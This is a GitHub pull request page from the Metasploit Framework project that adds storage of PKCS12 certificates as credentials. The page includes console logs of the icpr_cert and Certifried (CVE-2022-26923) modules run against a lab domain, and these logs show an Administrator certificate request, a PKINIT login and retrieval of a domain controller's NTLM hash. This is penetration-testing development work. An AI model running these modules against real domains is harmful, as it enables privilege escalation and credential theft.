metasploit-framework
metasploit-framework copied to clipboard
rapid7
Persist icpr cert as pkcs12 credential
Add support for persisting pkcs12 credentials in Metasploit. Updates the admin/dcerpc/icpr_cert module to persist requested certificates.
Depends on https://github.com/rapid7/metasploit-credential/pull/169
Example:
msf6 auxiliary(admin/dcerpc/icpr_cert) > rerun smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13 ca=adf3-DC3-CA cert_template=ESC1-Test smbdomain=ADF3.LOCAL [email protected]
[*] Reloading module...
[*] Running module against 192.168.123.13
[*] 192.168.123.13:445 - Requesting a certificate...
[+] 192.168.123.13:445 - The requested certificate was issued.
[*] 192.168.123.13:445 - Certificate UPN: [email protected]
[*] 192.168.123.13:445 - Certificate stored at: /Users/adfoster/.msf4/loot/20221209012934_default_unknown_windows.ad.cs_070132.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.123.13 192.168.123.13 445/tcp (smb) [email protected] subject: /CN=Administrator,issuer: /DC=local/DC=adf3/CN=adf3-DC3-CA Pkcs12 (pfx)
The pfx base64 blob is output with creds -v or creds -o foo.txt after https://github.com/rapid7/metasploit-framework/pull/17355 is merged
Verification
- Ensure the database is connect
- Ensure
bundle exec rails db:migratehas been run - Follow the steps from https://github.com/rapid7/metasploit-framework/pull/17240 and verify that the output of the creds command
This will most likely land into master after the kerberos branch is merged, taking off the feature label for now :+1:
I'm running into an error here:
msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > run
[*] Running module against 192.168.176.3
[+] [2023.04.12-11:44:19] 192.168.176.3:445 - Successfully authenticated to LDAP (192.168.176.3:636)
[+] [2023.04.12-11:44:22] 192.168.176.3:445 - Successfully created windomain.local\DESKTOP-EPLXTSOP$
[+] [2023.04.12-11:44:22] 192.168.176.3:445 - Password: mb4WQRCUxMUP5Uz1Yuhl2YZVQa3tazYf
[+] [2023.04.12-11:44:22] 192.168.176.3:445 - SID: S-1-5-21-2380665626-1154582258-49301182-1149
[+] [2023.04.12-11:44:22] 192.168.176.3:445 - Successfully authenticated to LDAP (192.168.176.3:636)
[*] [2023.04.12-11:44:22] 192.168.176.3:445 - Attempting to set the DNS hostname for the computer DESKTOP-EPLXTSOP$ to the DNS hostname for the DC: dc2019
[+] [2023.04.12-11:44:22] 192.168.176.3:445 - Successfully changed the DNS hostname
[+] [2023.04.12-11:44:24] 192.168.176.3:445 - The requested certificate was issued.
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Certificate SID: S-1-5-21-2380665626-1154582258-49301182-1149
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Certificate stored at: /Users/dwelch/.msf4/loot/20230412114424_default_192.168.176.3_windows.ad.cs_298084.pfx
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Attempting PKINIT login for [email protected]
[+] [2023.04.12-11:44:24] 192.168.176.3:445 - Successfully authenticated with certificate
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - 192.168.176.3:445 - TGT MIT Credential Cache ticket saved to /Users/dwelch/.msf4/loot/20230412114424_default_192.168.176.3_mit.kerberos.cca_288354.bin
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Trying to retrieve NT hash for dc2019$
[+] [2023.04.12-11:44:24] 192.168.176.3:445 - 192.168.176.3:88 - Received a valid TGS-Response
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - 192.168.176.3:445 - TGS MIT Credential Cache ticket saved to /Users/dwelch/.msf4/loot/20230412114424_default_192.168.176.3_mit.kerberos.cca_236126.bin
[+] [2023.04.12-11:44:24] 192.168.176.3:445 - Found NTLM hash for dc2019$: aad3b435b51404eeaad3b435b51404ee:ab60af0d9ee0336f8cc7df44c9f7caed
[*] [2023.04.12-11:44:24] 192.168.176.3:445 - Deleting the computer account DESKTOP-EPLXTSOP$
[+] [2023.04.12-11:44:25] 192.168.176.3:445 - The specified computer has been deleted.
[-] [2023.04.12-11:44:25] 192.168.176.3:445 - Auxiliary failed: NameError uninitialized constant Metasploit::Framework::Hashes
[-] [2023.04.12-11:44:25] 192.168.176.3:445 - Call stack:
[-] [2023.04.12-11:44:25] 192.168.176.3:445 - /Users/dwelch/dev/extras/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb:425:in `report_ntlm'
[-] [2023.04.12-11:44:25] 192.168.176.3:445 - /Users/dwelch/dev/extras/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb:421:in `get_ntlm_hash'
[-] [2023.04.12-11:44:25] 192.168.176.3:445 - /Users/dwelch/dev/extras/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb:124:in `run'
[*] Auxiliary module execution completed
https://github.com/rapid7/metasploit-framework/blob/2d30909a2f98435f1a01961cfd6a5a67be734eb1/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb#L425
FWIW though it did correctly add the PFX to the database
I'm running into an error here: ... [-] [2023.04.12-11:44:25] 192.168.176.3:445 - Auxiliary failed: NameError uninitialized constant Metasploit::Framework::Hashes
Looks like a regression from https://github.com/rapid7/metasploit-framework/pull/17784 - will put up a separate PR to fix
Release Notes
Adds support for persisting pkcs12 credentials in Metasploit, i.e. .pfx/.p12 files. The the auxiliary/admin/dcerpc/icpr_cert and auxiliary/admin/dcerpc/cve_2022_26923_certifried modules will now persist requested certificates for future exploitation. The creds command can also directly persist certificates - for example: creds add user:alice pkcs12:/path/to/certificate.pfx